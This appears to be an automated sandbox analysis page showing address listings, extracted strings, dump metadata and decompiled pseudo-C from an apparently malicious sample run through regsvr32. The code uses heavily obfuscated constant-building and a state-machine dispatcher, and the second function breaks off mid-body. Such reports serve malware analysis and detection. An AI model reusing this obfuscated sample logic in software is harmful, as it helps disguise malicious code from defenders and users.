0x04b9b782
0x04b9b78a
0x04b9b792
0x04b9b79a
0x04b9b7a5
0x04b9b7b0
0x04b9b7bb
0x04b9b7c6
0x04b9b7ce
0x04b9b7d9
0x04b9b7e1
0x04b9b7e9
0x04b9b7f3
0x04b9b7f6
0x04b9b7fa
0x04b9b802
0x04b9b80a
0x04b9b80f
0x04b9b81f
0x04b9b823
0x04b9b82b
0x04b9b836
0x04b9b841
0x04b9b84c
0x04b9b854
0x04b9b85c
0x04b9b864
0x04b9b86c
0x04b9b874
0x04b9b880
0x04b9b883
0x04b9b88f
0x04b9b893
0x04b9b89b
0x04b9b8a3
0x04b9b8ab
0x04b9b8b3
0x04b9b8bb
0x04b9b8c2
0x04b9b8c2
0x04b9b8c2
0x04b9b8c6
0x04b9b8c6
0x04b9b8cb
0x04b9b8cb
0x04b9b8cb
0x04b9b8cf
0x04b9b8cf
0x04b9b8cf
0x04b9b8d5
0x00000000
0x00000000
0x04b9b8db
0x00000000
0x04b9bb8a
0x04b9b8e7
0x04b9b9c3
0x04b9b9c4
0x04b9b9c5
0x04b9b9c6
0x04b9b9cd
0x04b9b9d1
0x04b9b9d5
0x04b9b9dc
0x04b9b9dd
0x04b9b9e1
0x04b9b9e2
0x04b9b9f3
0x04b9ba01
0x04b9ba08
0x04b9ba0d
0x04b9ba12
0x04b9bb1f
0x04b9bb1f
0x04b9b8c2
0x04b9b8c2
0x04b9b8c2
0x00000000
0x04b9b8c2
0x04b9ba18
0x04b9ba1f
0x04b9ba27
0x04b9ba39
0x04b9ba3d
0x04b9ba41
0x00000000
0x04b9ba41
0x00000000
0x04b9b8ed
0x04b9b8f3
0x04b9b99b
0x04b9b99d
0x04b9b9a0
0x04b9b9ab
0x04b9b9af
0x04b9b9b4
0x00000000
0x04b9b8f5
0x04b9b8fb
0x04b9b95f
0x04b9b966
0x04b9b8c2
0x04b9b8c2
0x04b9b8c2
0x00000000
0x04b9b8c2
0x04b9b8fd
0x04b9b903
0x04b9b947
0x00000000
0x04b9b905
0x04b9b90b
0x04b9bb65
0x04b9bb6b
0x04b9bb6d
0x00000000
0x04b9bb6d
0x04b9b911
0x04b9b924
0x04b9b925
0x04b9b92b
0x04b9b930
0x04b9b932
0x04b9b937
0x04b9b93d
0x04b9b8c2
0x04b9b8c2
0x04b9b8c2
0x04b9b8c6
0x04b9b8cb
0x04b9b8cb
0x00000000
0x04b9b8cb
0x04b9b8c2
0x04b9b937
0x04b9b90b
0x04b9b903
0x04b9b8fb
0x04b9b8f3
0x04b9bb95
0x04b9bb95
0x00000000
0x04b9bb95
0x04b9ba4f
0x04b9bb3c
0x04b9bb3d
0x04b9bb43
0x04b9bb48
0x04b9bb4a
0x04b9bb4f
0x04b9bb5b
0x00000000
0x04b9bb51
0x04b9bb51
0x00000000
0x04b9bb51
0x04b9ba55
0x04b9ba5b
0x04b9bb17
0x04b9bb1c
0x00000000
0x04b9ba61
0x04b9ba67
0x04b9bada
0x04b9badf
0x04b9bae7
0x00000000
0x04b9ba69
0x04b9ba6b
0x04b9ba9c
0x04b9bac3
0x04b9bacd
0x04b9bad2
0x04b9bb60
0x04b9bb60
0x04b9bb60
0x00000000
0x04b9ba6b
0x04b9ba67
0x04b9ba5b
0x00000000
0x04b9ba4f
0x04b9b8cb
0x04b9b8c6

Strings

E!, xrefs: 04B9B6F3
bu, xrefs: 04B9B6E0
{u, xrefs: 04B9B4A2
s4, xrefs: 04B9B513
B, xrefs: 04B9B6B8
+V, xrefs: 04B9B457
&-, xrefs: 04B9B3E0
[D, xrefs: 04B9B8B3
[7, xrefs: 04B9B7E1

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: s4$&-$+V$E!$[7$[D$bu${u$B
API String ID: 0-2389712741
Opcode ID: ef6ac798c9392941f1a0e429090c8fbff63c34f89c27df27b1f91d65bd96e706
Instruction ID: 2410402c66161df04717cd9897c1ff1e4d3a283c9f0b1a0b34da384e1c05867e
Opcode Fuzzy Hash: ef6ac798c9392941f1a0e429090c8fbff63c34f89c27df27b1f91d65bd96e706
Instruction Fuzzy Hash: AF2214B250C3809FE768CF25D989A5BBBE1FBC4708F10892DE5D996260D7B19949CF03

Uniqueness

Uniqueness Score: -1.00%

Function 04B8C6B8, Relevance: 11.7, Strings: 9, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E04B8C6B8() {
				char _v520;
				char _v1040;
				char _v1560;
				char _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				void* _t478;
				void* _t479;
				intOrPtr _t482;
				intOrPtr _t486;
				signed int _t494;
				intOrPtr* _t497;
				signed int _t501;
				intOrPtr _t502;
				intOrPtr* _t503;
				signed int _t504;
				signed int _t505;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				void* _t513;
				void* _t522;
				void* _t562;
				signed int _t564;
				signed int* _t568;

				_t568 =  &_v1764;
				_v1588 = 0x57daab;
				_v1588 = _v1588 + 0x535a;
				_v1588 = _v1588 ^ 0x00582e2c;
				_v1756 = 0x11011b;
				_v1756 = _v1756 | 0x986fcb94;
				_v1756 = _v1756 + 0xffff0812;
				_v1756 = _v1756 | 0x2bc6aa33;
				_v1756 = _v1756 ^ 0x3bfefbb2;
				_v1652 = 0x5adeab;
				_v1652 = _v1652 + 0xffff93f0;
				_v1652 = _v1652 ^ 0xbf2e951e;
				_v1652 = _v1652 ^ 0xbf74e787;
				_v1668 = 0x1eca4f;
				_v1668 = _v1668 + 0x52c;
				_v1568 = 0;
				_v1668 = _v1668 * 0xb;
				_t562 = 0xbc1c7ad;
				_v1668 = _v1668 ^ 0x0152ea48;
				_v1584 = 0x89d737;
				_v1584 = _v1584 + 0xffff9374;
				_v1584 = _v1584 ^ 0x0082a8e0;
				_v1672 = 0x7da8ac;
				_v1672 = _v1672 >> 0xf;
				_v1672 = _v1672 | 0x438c492a;
				_v1672 = _v1672 ^ 0x438e7d89;
				_v1636 = 0xa2c3bd;
				_v1636 = _v1636 << 3;
				_v1636 = _v1636 ^ 0x051ae408;
				_v1720 = 0x328717;
				_v1720 = _v1720 << 0xc;
				_v1720 = _v1720 << 0xd;
				_v1720 = _v1720 + 0x9e9a;
				_v1720 = _v1720 ^ 0x2e0b4663;
				_v1760 = 0x4b7b55;
				_t57 =  &_v1760; // 0x4b7b55
				_t504 = 0x6f;
				_v1760 =  *_t57 / _t504;
				_v1760 = _v1760 >> 0xb;
				_t505 = 0x66;
				_t564 = 6;
				_v1760 = _v1760 * 0x46;
				_v1760 = _v1760 ^ 0x00015e15;
				_v1740 = 0xf42b27;
				_v1740 = _v1740 / _t505;
				_t506 = 0x21;
				_v1740 = _v1740 * 0x3b;
				_v1740 = _v1740 / _t564;
				_v1740 = _v1740 ^ 0x00118050;
				_v1680 = 0x69fb04;
				_v1680 = _v1680 / _t506;
				_v1680 = _v1680 + 0x2a45;
				_v1680 = _v1680 ^ 0x000477f2;
				_v1624 = 0xeefab1;
				_v1624 = _v1624 << 0xb;
				_v1624 = _v1624 ^ 0x77d908fd;
				_v1688 = 0x983026;
				_v1688 = _v1688 ^ 0xf9038374;
				_v1688 = _v1688 << 1;
				_v1688 = _v1688 ^ 0xf3384871;
				_v1656 = 0xbd9fd7;
				_v1656 = _v1656 | 0x34570662;
				_v1656 = _v1656 << 0xf;
				_v1656 = _v1656 ^ 0xcff19553;
				_v1724 = 0xb73e9;
				_v1724 = _v1724 + 0xffff2aba;
				_t507 = 0x1b;
				_v1724 = _v1724 * 0x2b;
				_v1724 = _v1724 + 0xffffc5c3;
				_v1724 = _v1724 ^ 0x01cec31d;
				_v1732 = 0xfb07a0;
				_v1732 = _v1732 + 0xfffff0a2;
				_v1732 = _v1732 ^ 0xe8e4881c;
				_v1732 = _v1732 + 0xfffffa8c;
				_v1732 = _v1732 ^ 0xe819b6c9;
				_v1664 = 0x98c4f6;
				_v1664 = _v1664 / _t507;
				_v1664 = _v1664 + 0xffffc9a9;
				_v1664 = _v1664 ^ 0x000722b9;
				_v1704 = 0x7b43f4;
				_v1704 = _v1704 + 0x33bf;
				_v1704 = _v1704 ^ 0xbdcd0236;
				_v1704 = _v1704 ^ 0xbdbcc173;
				_v1600 = 0x907d1c;
				_v1600 = _v1600 >> 0xa;
				_v1600 = _v1600 ^ 0x000f3001;
				_v1608 = 0x549b29;
				_v1608 = _v1608 + 0xffff560f;
				_v1608 = _v1608 ^ 0x005a0ce7;
				_v1648 = 0x53669a;
				_t508 = 0x60;
				_v1648 = _v1648 * 0x53;
				_v1648 = _v1648 * 0x2d;
				_v1648 = _v1648 ^ 0xc0c27601;
				_v1616 = 0xf6b3f;
				_v1616 = _v1616 << 0xf;
				_v1616 = _v1616 ^ 0xb591763f;
				_v1712 = 0xd11a2f;
				_v1712 = _v1712 >> 3;
				_v1712 = _v1712 + 0x34a7;
				_v1712 = _v1712 + 0xffffa6d8;
				_v1712 = _v1712 ^ 0x001715b5;
				_v1744 = 0x782a81;
				_v1744 = _v1744 >> 5;
				_v1744 = _v1744 >> 3;
				_v1744 = _v1744 * 0x57;
				_v1744 = _v1744 ^ 0x00239f7e;
				_v1728 = 0xdf27c0;
				_v1728 = _v1728 + 0xb655;
				_v1728 = _v1728 >> 0xf;
				_v1728 = _v1728 | 0x1084c50a;
				_v1728 = _v1728 ^ 0x10890bcf;
				_v1612 = 0xd31e5c;
				_v1612 = _v1612 / _t508;
				_v1612 = _v1612 ^ 0x000f28c0;
				_v1640 = 0xad59ab;
				_v1640 = _v1640 ^ 0x540bc483;
				_v1640 = _v1640 ^ 0x54aa6eab;
				_v1596 = 0xfc600e;
				_v1596 = _v1596 << 1;
				_v1596 = _v1596 ^ 0x01f16920;
				_v1676 = 0x70f7b6;
				_v1676 = _v1676 >> 1;
				_v1676 = _v1676 | 0x834faa8e;
				_v1676 = _v1676 ^ 0x837cfefc;
				_v1580 = 0xc67f49;
				_v1580 = _v1580 ^ 0x220388f4;
				_v1580 = _v1580 ^ 0x22cc2a29;
				_v1604 = 0xf53a42;
				_v1604 = _v1604 + 0x1d20;
				_v1604 = _v1604 ^ 0x00fba671;
				_v1764 = 0x3c20a1;
				_v1764 = _v1764 << 0xa;
				_v1764 = _v1764 | 0xcc5879dc;
				_v1764 = _v1764 + 0x7d87;
				_v1764 = _v1764 ^ 0xfcd01767;
				_v1736 = 0xfcd131;
				_v1736 = _v1736 | 0xb098ccc9;
				_v1736 = _v1736 + 0x1f04;
				_v1736 = _v1736 | 0xe0e1c446;
				_v1736 = _v1736 ^ 0xf0fbfa39;
				_v1684 = 0x6ca78a;
				_v1684 = _v1684 >> 0xd;
				_t509 = 0x5d;
				_v1684 = _v1684 / _t509;
				_v1684 = _v1684 ^ 0x00062aae;
				_v1576 = 0x28ea20;
				_t510 = 0x2d;
				_v1576 = _v1576 / _t510;
				_v1576 = _v1576 ^ 0x000e137d;
				_v1632 = 0x34444a;
				_v1632 = _v1632 + 0xb7da;
				_v1632 = _v1632 ^ 0x00330b1f;
				_v1748 = 0x707d69;
				_v1748 = _v1748 << 0xb;
				_v1748 = _v1748 ^ 0xb1536161;
				_v1748 = _v1748 + 0xffff04ff;
				_v1748 = _v1748 ^ 0x32b99598;
				_v1696 = 0x3e2d26;
				_v1696 = _v1696 + 0x9f8b;
				_v1696 = _v1696 + 0xf840;
				_v1696 = _v1696 ^ 0x00305f5f;
				_v1700 = 0x43ad40;
				_t511 = 0x7e;
				_v1700 = _v1700 / _t511;
				_v1700 = _v1700 + 0x17b0;
				_v1700 = _v1700 ^ 0x000023e6;
				_v1628 = 0x615af9;
				_v1628 = _v1628 | 0xc5f525fd;
				_v1628 = _v1628 ^ 0xc5f01915;
				_v1752 = 0xf7a5b1;
				_v1752 = _v1752 | 0xfe49737c;
				_v1752 = _v1752 + 0x9fc0;
				_v1752 = _v1752 ^ 0x9fa1c746;
				_v1752 = _v1752 ^ 0x60a54bb7;
				_v1572 = 0x7bbdbf;
				_t512 = 0xe;
				_v1572 = _v1572 * 0x2d;
				_v1572 = _v1572 ^ 0x15c0521a;
				_v1620 = 0xd84802;
				_v1620 = _v1620 ^ 0x3749a239;
				_v1620 = _v1620 ^ 0x37909643;
				_v1644 = 0xebc394;
				_v1644 = _v1644 << 8;
				_v1644 = _v1644 ^ 0xebca8902;
				_v1692 = 0x3d115c;
				_v1692 = _v1692 ^ 0xaeae6a77;
				_v1692 = _v1692 >> 0x10;
				_v1692 = _v1692 ^ 0x000f7307;
				_v1660 = 0x8a3dcc;
				_v1660 = _v1660 ^ 0x1263d9af;
				_v1660 = _v1660 / _t512;
				_v1660 = _v1660 ^ 0x015f4699;
				_v1592 = 0x64d88c;
				_v1592 = _v1592 ^ 0xc97cb881;
				_v1592 = _v1592 ^ 0xc91c2e76;
				_v1708 = 0x9c1e71;
				_v1708 = _v1708 ^ 0xd16e05af;
				_v1708 = _v1708 | 0x50445732;
				_v1708 = _v1708 << 5;
				_v1708 = _v1708 ^ 0x3ec99884;
				_v1716 = 0xd3e518;
				_v1716 = _v1716 + 0xffff72ee;
				_t501 = _v1568;
				_v1716 = _v1716 / _t564;
				_v1716 = _v1716 << 0xa;
				_v1716 = _v1716 ^ 0x8cea7ffc;
				while(1) {
					L1:
					_t513 = 0x5c;
					while(1) {
						L2:
						_t478 = 0x5243326;
						do {
							L3:
							if(_t562 == 0x22d4857) {
								_push(_v1688);
								_push(_v1624);
								_push(_v1680);
								_t479 = E04B9E1F8(0x4b81030, _v1740, __eflags);
								E04B87078( &_v520, __eflags);
								_t482 =  *0x4ba6214; // 0x0
								_t486 =  *0x4ba6214; // 0x0
								__eflags = _t486 + 0x34;
								E04B8F96F(_v1656, _t486 + 0x34, _t486 + 0x34, _t479,  &_v520, _v1724,  &_v1560, _t482 + 0x23c, _v1732, _v1664, _v1704,  &_v1040);
								E04B9FECB(_t479, _v1600, _v1608, _v1648, _v1616);
								_t568 =  &(_t568[0x10]);
								_t562 = 0x6f5d8c5;
								goto L19;
							} else {
								if(_t562 == 0x3a11f46) {
									_push(_v1612);
									_push(_v1728);
									_push(_v1744);
									__eflags = E04B82DEA(_v1640,  &_v1564, _v1596, 0x4b810a0, _v1756, _v1676, 0x4b810a0, 0x4b810a0, _v1580, _v1604, 0x4b810a0, 0x4b810a0, _v1652, _v1764, _v1736, _v1684, _v1576, E04B9E1F8(0x4b810a0, _v1712, __eflags));
									_t562 =  ==  ? 0x5243326 : 0xbc3e7f;
									E04B9FECB(_t490, _v1632, _v1748, _v1696, _v1700);
									_t568 =  &(_t568[0x16]);
									L19:
									_t478 = 0x5243326;
									_t513 = 0x5c;
									goto L20;
								} else {
									if(_t562 == _t478) {
										_t494 = E04B900C5( &_v1560, _v1628, _v1752);
										_pop(_t522);
										_t497 = E04B92CD9(_v1572, _t501,  &_v1560, _t522, _v1564, _v1668, _v1620, 2 + _t494 * 2, _v1644, _v1692, _v1660);
										_t568 =  &(_t568[9]);
										__eflags = _t497;
										_t562 = 0xcd5a5d6;
										_v1568 = 0 | __eflags == 0x00000000;
										goto L1;
									} else {
										if(_t562 == 0x6f5d8c5) {
											_t502 =  *0x4ba6214; // 0x0
											_t503 = _t502 + 0x23c;
											while(1) {
												__eflags =  *_t503 - _t513;
												if(__eflags == 0) {
													break;
												}
												_t503 = _t503 + 2;
												__eflags = _t503;
											}
											_t501 = _t503 + 2;
											_t562 = 0x3a11f46;
											goto L2;
										} else {
											if(_t562 == 0xbc1c7ad) {
												E04B81A34(_v1584,  &_v1040, _t513, _t513, _v1672, _v1636, _v1720, _t513, _v1588, _v1760);
												_t568 =  &(_t568[8]);
												_t562 = 0x22d4857;
												while(1) {
													L1:
													_t513 = 0x5c;
													L2:
													_t478 = 0x5243326;
													goto L3;
												}
											} else {
												if(_t562 != 0xcd5a5d6) {
													goto L20;
												} else {
													E04B853D0(_v1592, _v1708, _v1716, _v1564);
												}
											}
										}
									}
								}
							}
							L10:
							return _v1568;
							L20:
							__eflags = _t562 - 0xbc3e7f;
						} while (__eflags != 0);
						goto L10;
					}
				}
			}

0x04b8c6b8
0x04b8c6be
0x04b8c6cb
0x04b8c6d8
0x04b8c6e3
0x04b8c6eb
0x04b8c6f3
0x04b8c6fb
0x04b8c703
0x04b8c70b
0x04b8c713
0x04b8c71b
0x04b8c723
0x04b8c72b
0x04b8c733
0x04b8c73b
0x04b8c74b
0x04b8c74f
0x04b8c754
0x04b8c75c
0x04b8c767
0x04b8c772
0x04b8c77d
0x04b8c785
0x04b8c78a
0x04b8c792
0x04b8c79a
0x04b8c7a5
0x04b8c7ad
0x04b8c7b8
0x04b8c7c0
0x04b8c7c5
0x04b8c7ca
0x04b8c7d2
0x04b8c7da
0x04b8c7e2
0x04b8c7e8
0x04b8c7ed
0x04b8c7f3
0x04b8c7fd
0x04b8c800
0x04b8c803
0x04b8c807
0x04b8c80f
0x04b8c81f
0x04b8c828
0x04b8c829
0x04b8c835
0x04b8c839
0x04b8c841
0x04b8c84f
0x04b8c853
0x04b8c85b
0x04b8c863
0x04b8c86e
0x04b8c876
0x04b8c881
0x04b8c889
0x04b8c891
0x04b8c895
0x04b8c89f
0x04b8c8a7
0x04b8c8af
0x04b8c8b4
0x04b8c8bc
0x04b8c8c4
0x04b8c8d3
0x04b8c8d6
0x04b8c8da
0x04b8c8e2
0x04b8c8ea
0x04b8c8f2
0x04b8c8fa
0x04b8c902
0x04b8c90a
0x04b8c912
0x04b8c922
0x04b8c926
0x04b8c92e
0x04b8c936
0x04b8c93e
0x04b8c946
0x04b8c94e
0x04b8c956
0x04b8c961
0x04b8c969
0x04b8c974
0x04b8c97f
0x04b8c98a
0x04b8c995
0x04b8c9a8
0x04b8c9a9
0x04b8c9b8
0x04b8c9bf
0x04b8c9ca
0x04b8c9d5
0x04b8c9dd
0x04b8c9e8
0x04b8c9f0
0x04b8c9f5
0x04b8c9fd
0x04b8ca05
0x04b8ca0d
0x04b8ca15
0x04b8ca1a
0x04b8ca24
0x04b8ca28
0x04b8ca30
0x04b8ca38
0x04b8ca40
0x04b8ca45
0x04b8ca4d
0x04b8ca55
0x04b8ca69
0x04b8ca70
0x04b8ca7b
0x04b8ca86
0x04b8ca91
0x04b8ca9c
0x04b8caa7
0x04b8caae
0x04b8cab9
0x04b8cac1
0x04b8cac5
0x04b8cacd
0x04b8cad5
0x04b8cae0
0x04b8caeb
0x04b8caf6
0x04b8cb03
0x04b8cb0e
0x04b8cb19
0x04b8cb21
0x04b8cb26
0x04b8cb2e
0x04b8cb36
0x04b8cb3e
0x04b8cb46
0x04b8cb4e
0x04b8cb56
0x04b8cb5e
0x04b8cb66
0x04b8cb6e
0x04b8cb79
0x04b8cb7e
0x04b8cb84
0x04b8cb8c
0x04b8cb9e
0x04b8cba3
0x04b8cbac
0x04b8cbb7
0x04b8cbc2
0x04b8cbcd
0x04b8cbd8
0x04b8cbe0
0x04b8cbe5
0x04b8cbed
0x04b8cbf5
0x04b8cbfd
0x04b8cc05
0x04b8cc0d
0x04b8cc15
0x04b8cc1d
0x04b8cc29
0x04b8cc2e
0x04b8cc34
0x04b8cc3c
0x04b8cc44
0x04b8cc4f
0x04b8cc5a
0x04b8cc65
0x04b8cc6d
0x04b8cc75
0x04b8cc7d
0x04b8cc85
0x04b8cc8d
0x04b8cca0
0x04b8cca1
0x04b8cca8
0x04b8ccb3
0x04b8ccbe
0x04b8ccc9
0x04b8ccd4
0x04b8ccdf
0x04b8cce7
0x04b8ccf2
0x04b8ccfa
0x04b8cd02
0x04b8cd07
0x04b8cd0f
0x04b8cd17
0x04b8cd25
0x04b8cd29
0x04b8cd33
0x04b8cd43
0x04b8cd4e
0x04b8cd59
0x04b8cd61
0x04b8cd69
0x04b8cd71
0x04b8cd76
0x04b8cd7e
0x04b8cd86
0x04b8cd94
0x04b8cd9b
0x04b8cd9f
0x04b8cda4
0x04b8cdac
0x04b8cdac
0x04b8cdae
0x04b8cdaf
0x04b8cdaf
0x04b8cdaf
0x04b8cdb4
0x04b8cdb4
0x04b8cdba
0x04b8cfa1
0x04b8cfaa
0x04b8cfb1
0x04b8cfb9
0x04b8cfc7
0x04b8cfe8
0x04b8d00e
0x04b8d013
0x04b8d018
0x04b8d03b
0x04b8d040
0x04b8d043
0x00000000
0x04b8cdc0
0x04b8cdc2
0x04b8cef5
0x04b8cf01
0x04b8cf05
0x04b8cf71
0x04b8cf91
0x04b8cf94
0x04b8cf99
0x04b8d048
0x04b8d04a
0x04b8d04f
0x00000000
0x04b8cdc8
0x04b8cdca
0x04b8ce91
0x04b8ce96
0x04b8ced5
0x04b8cedc
0x04b8cedf
0x04b8cee1
0x04b8cee9
0x00000000
0x04b8cdd0
0x04b8cdd6
0x04b8ce5f
0x04b8ce65
0x04b8ce70
0x04b8ce70
0x04b8ce73
0x00000000
0x00000000
0x04b8ce6d
0x04b8ce6d
0x04b8ce6d
0x04b8ce75
0x04b8ce78
0x00000000
0x04b8cddc
0x04b8cde2
0x04b8ce4d
0x04b8ce52
0x04b8ce55
0x04b8cdac
0x04b8cdac
0x04b8cdae
0x04b8cdaf
0x04b8cdaf
0x00000000
0x04b8cdaf
0x04b8cde4
0x04b8cdea
0x00000000
0x04b8cdf0
0x04b8ce06
0x04b8ce0c
0x04b8cdea
0x04b8cde2
0x04b8cdd6
0x04b8cdca
0x04b8cdc2
0x04b8ce0d
0x04b8ce1e
0x04b8d050
0x04b8d050
0x04b8d050
0x00000000
0x04b8d05c
0x04b8cdaf

Strings

i}p, xrefs: 04B8CBD8
2WDP, xrefs: 04B8CD69
#, xrefs: 04B8CC3C
E*, xrefs: 04B8C853
JD4, xrefs: 04B8CBB7
__0, xrefs: 04B8CC15
(, xrefs: 04B8CB8C
,.X, xrefs: 04B8C6D8
U{K, xrefs: 04B8C7E2

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ($,.X$2WDP$E*$JD4$U{K$__0$i}p$#
API String ID: 0-2449995950
Opcode ID: 725c6505b802a4e9174e21e9480ed40587cf29ed10acd217507b03206e9d2309
Instruction ID: 27f4201d720b96efc1a16eedf9add0e89fa20455275cea137d4a600d8a05e4fc
Opcode Fuzzy Hash: 725c6505b802a4e9174e21e9480ed40587cf29ed10acd217507b03206e9d2309
Instruction Fuzzy Hash: C122217150C3809FD3A8CF64C58AA8BBBF2FBC4358F10891DE19986260D7B59949DF03

Uniqueness

Uniqueness Score: -1.00%

Function 04B9E955, Relevance: 11.6, Strings: 9, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E04B9E955() {
				char _v524;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				unsigned int _v708;
				signed int _t316;
				void* _t319;
				intOrPtr _t320;
				intOrPtr _t323;
				intOrPtr _t328;
				void* _t331;
				void* _t334;
				void* _t335;
				char _t342;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				unsigned int* _t372;

				_t372 =  &_v708;
				_v576 = 0xda0c08;
				_v576 = _v576 + 0xffff47d7;
				_t335 = 0x67615db;
				_v576 = _v576 ^ 0x00d953de;
				_v616 = 0x1aa62a;
				_v616 = _v616 ^ 0x887273cb;
				_v616 = _v616 ^ 0x8868d4e1;
				_v696 = 0x6cc5ff;
				_v696 = _v696 + 0xffff0f33;
				_v696 = _v696 + 0xffffebff;
				_v696 = _v696 + 0xffff9323;
				_v696 = _v696 ^ 0x006b5457;
				_v620 = 0xd441f6;
				_v620 = _v620 >> 2;
				_v620 = _v620 ^ 0x0035107d;
				_v668 = 0xe6e8c4;
				_v668 = _v668 + 0xffff0cc3;
				_v668 = _v668 | 0x11364c4e;
				_v668 = _v668 ^ 0x11fae4e7;
				_v664 = 0xedeede;
				_v664 = _v664 + 0x8dc4;
				_v664 = _v664 >> 0xb;
				_v664 = _v664 ^ 0x00096569;
				_v644 = 0x7bf23b;
				_v644 = _v644 + 0x7679;
				_v644 = _v644 << 2;
				_v644 = _v644 ^ 0x01f0e7c7;
				_v588 = 0xd55e4f;
				_v588 = _v588 >> 8;
				_v588 = _v588 ^ 0x000a9525;
				_v648 = 0x4b711e;
				_v648 = _v648 + 0xffff1f62;
				_v648 = _v648 ^ 0xa93f12d6;
				_v648 = _v648 ^ 0xa9763896;
				_v584 = 0xdb5f0a;
				_v584 = _v584 * 0x19;
				_t334 = 0;
				_v584 = _v584 ^ 0x156e4d85;
				_v608 = 0x3263c9;
				_v608 = _v608 + 0xe60;
				_v608 = _v608 ^ 0x0036f835;
				_v640 = 0x3b5ffd;
				_t365 = 0x46;
				_v640 = _v640 * 5;
				_v640 = _v640 / _t365;
				_v640 = _v640 ^ 0x000ce458;
				_v708 = 0xb95ed6;
				_t366 = 0x5a;
				_v708 = _v708 / _t366;
				_v708 = _v708 ^ 0x64dff63e;
				_v708 = _v708 >> 0x10;
				_v708 = _v708 ^ 0x000970e9;
				_v672 = 0xda5c0b;
				_v672 = _v672 >> 5;
				_v672 = _v672 * 0x6e;
				_v672 = _v672 ^ 0x02ed68c8;
				_v600 = 0xb0c206;
				_v600 = _v600 + 0x21e9;
				_v600 = _v600 ^ 0x00b07205;
				_v684 = 0x1b8021;
				_v684 = _v684 << 2;
				_v684 = _v684 >> 0xb;
				_v684 = _v684 << 8;
				_v684 = _v684 ^ 0x0007a69d;
				_v700 = 0x716346;
				_v700 = _v700 >> 0xe;
				_v700 = _v700 << 9;
				_v700 = _v700 | 0x54417142;
				_v700 = _v700 ^ 0x544d1ccb;
				_v704 = 0x83733f;
				_v704 = _v704 << 0xe;
				_v704 = _v704 << 1;
				_t367 = 0xf;
				_v704 = _v704 / _t367;
				_v704 = _v704 ^ 0x0c51ca4a;
				_v676 = 0x255e7;
				_v676 = _v676 ^ 0x45c0186f;
				_v676 = _v676 ^ 0x0e243a79;
				_v676 = _v676 ^ 0x4be8c079;
				_v652 = 0xc8a42f;
				_t368 = 0x3b;
				_v652 = _v652 * 0x1e;
				_v652 = _v652 + 0xffffdb98;
				_v652 = _v652 ^ 0x178e8932;
				_v660 = 0x399dd9;
				_v660 = _v660 << 0x10;
				_v660 = _v660 << 1;
				_v660 = _v660 ^ 0x3bb87d79;
				_v596 = 0x4a6152;
				_v596 = _v596 + 0xeb3a;
				_v596 = _v596 ^ 0x00451e15;
				_v604 = 0x1a296a;
				_v604 = _v604 >> 3;
				_v604 = _v604 ^ 0x000806f7;
				_v628 = 0x8a6a9a;
				_v628 = _v628 << 0xc;
				_v628 = _v628 / _t368;
				_v628 = _v628 ^ 0x02ddb0c3;
				_v612 = 0x56dff1;
				_v612 = _v612 << 4;
				_v612 = _v612 ^ 0x056559b2;
				_v592 = 0xb835f;
				_v592 = _v592 ^ 0x56373199;
				_v592 = _v592 ^ 0x563f1b5a;
				_v636 = 0x2555d1;
				_v636 = _v636 + 0xffff7c76;
				_v636 = _v636 | 0x931e680c;
				_v636 = _v636 ^ 0x933edc2a;
				_v688 = 0x729e7a;
				_v688 = _v688 + 0x52a9;
				_v688 = _v688 << 6;
				_v688 = _v688 ^ 0x08219d26;
				_v688 = _v688 ^ 0x149a839d;
				_v656 = 0xbb5b70;
				_v656 = _v656 + 0x6c7b;
				_v656 = _v656 | 0x24d7418a;
				_v656 = _v656 ^ 0x24f0c3f7;
				_v692 = 0xac0342;
				_v692 = _v692 + 0x6c81;
